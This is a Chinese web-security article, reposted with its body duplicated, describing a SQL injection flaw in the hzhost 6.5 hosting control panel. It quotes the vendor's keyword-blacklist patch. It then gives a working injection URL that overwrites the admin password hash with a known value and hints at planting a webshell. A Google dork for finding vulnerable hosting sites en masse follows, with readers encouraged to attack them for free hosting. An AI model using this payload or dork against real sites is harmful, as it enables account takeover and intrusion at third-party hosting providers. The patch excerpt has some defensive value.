hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞
网络安全 2021-07-03 09:19www.168986.cn网络安全知识
这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.
正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:
Function SafeRequest(ParaName)
Dim ParaValue
ParaValue=Request(ParaName)
if IsNumeric(ParaValue) then
SafeRequest=ParaValue
exit Function
else
ParaValuetemp=lcase(ParaValue)
tempvalue="select|insert|delete|union|
join|script|applet|object|’|drop|update|truncate|
create|xp_cmdshell|exec|alter|cast|rename|modify”
temps=split(tempvalue,”|”)
for mycount=0 to ubound(temps)
if Instr(ParaValuetemp,temps(mycount)) > 0 and lcase(ParaName)<>”module” then
call errorpage(-2,”您提交的内容包含了字符["&temps(mycount)&"],请去除后重新提交或联系我们…”)
response.end
end if
next
SafeRequest=ParaValue
end if
End function
代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的SQL语句.
利用方法如下:
http://.xxx./incs/channeldmectr.asp?domainname=1′);{我们构造的语句}–
狼蚁网站SEO优化给出一个示范语句:
http://.xxx./incs/channeldmectr.asp?domainname=1′);Update [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ Where u_nme=’admin’–
语句的意思是将管理员账号admin的密码改为123456.
大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略.
丢个关键词给大家,Google搜索inurl:pdtshw/hstshw会出来大批的使用华众平台的IDC站点..转自.hacksb.
我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载.
OK,就介绍到这里,想拿免费空间的淫们现在也可以行动了..
(本文为普瑞斯特编辑整理) http://.hacksb.
正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:
复制代码
代码如下:Function SafeRequest(ParaName)
Dim ParaValue
ParaValue=Request(ParaName)
if IsNumeric(ParaValue) then
SafeRequest=ParaValue
exit Function
else
ParaValuetemp=lcase(ParaValue)
tempvalue="select|insert|delete|union|
join|script|applet|object|’|drop|update|truncate|
create|xp_cmdshell|exec|alter|cast|rename|modify”
temps=split(tempvalue,”|”)
for mycount=0 to ubound(temps)
if Instr(ParaValuetemp,temps(mycount)) > 0 and lcase(ParaName)<>”module” then
call errorpage(-2,”您提交的内容包含了字符["&temps(mycount)&"],请去除后重新提交或联系我们…”)
response.end
end if
next
SafeRequest=ParaValue
end if
End function
代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的SQL语句.
利用方法如下:
http://.xxx./incs/channeldmectr.asp?domainname=1′);{我们构造的语句}–
狼蚁网站SEO优化给出一个示范语句:
http://.xxx./incs/channeldmectr.asp?domainname=1′);Update [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ Where u_nme=’admin’–
语句的意思是将管理员账号admin的密码改为123456.
大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略.
丢个关键词给大家,Google搜索inurl:pdtshw/hstshw会出来大批的使用华众平台的IDC站点..转自.hacksb.
我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载.
OK,就介绍到这里,想拿免费空间的淫们现在也可以行动了..
(本文为普瑞斯特编辑整理) http://.hacksb.
上一篇:防止apache的php扩展名解析漏洞
下一篇:PHP 万能密码
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座